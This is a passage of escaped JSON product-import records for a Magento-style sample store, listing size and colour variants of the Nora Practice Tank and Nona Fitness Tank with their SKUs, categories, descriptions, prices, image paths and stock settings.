rom_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1666\":{\"sku\":\"WT03-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-XL-Orange\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1667\":{\"sku\":\"WT03-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-XL-Purple\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1668\":{\"sku\":\"WT03-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-XL-Red\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1669\":{\"sku\":\"WT03\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Lycra&reg;|Organic Cotton,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WT03-XS-Orange,size=XS,color=Orange|sku=WT03-XS-Purple,size=XS,color=Purple|sku=WT03-XS-Red,size=XS,color=Red|sku=WT03-S-Orange,size=S,color=Orange|sku=WT03-S-Purple,size=S,color=Purple|sku=WT03-S-Red,size=S,color=Red|sku=WT03-M-Orange,size=M,color=Orange|sku=WT03-M-Purple,size=M,color=Purple|sku=WT03-M-Red,size=M,color=Red|sku=WT03-L-Orange,size=L,color=Orange|sku=WT03-L-Purple,size=L,color=Purple|sku=WT03-L-Red,size=L,color=Red|sku=WT03-XL-Orange,size=XL,color=Orange|sku=WT03-XL-Purple,size=XL,color=Purple|sku=WT03-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Lycra&reg;|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"Yes\",\"sale\":\"No\"},\"1670\":{\"sku\":\"WT04-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-XS-Blue\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1671\":{\"sku\":\"WT04-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-XS-Purple\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1672\":{\"sku\":\"WT04-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-XS-Red\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1673\":{\"sku\":\"WT04-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-S-Blue\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1674\":{\"sku\":\"WT04-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-S-Purple\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 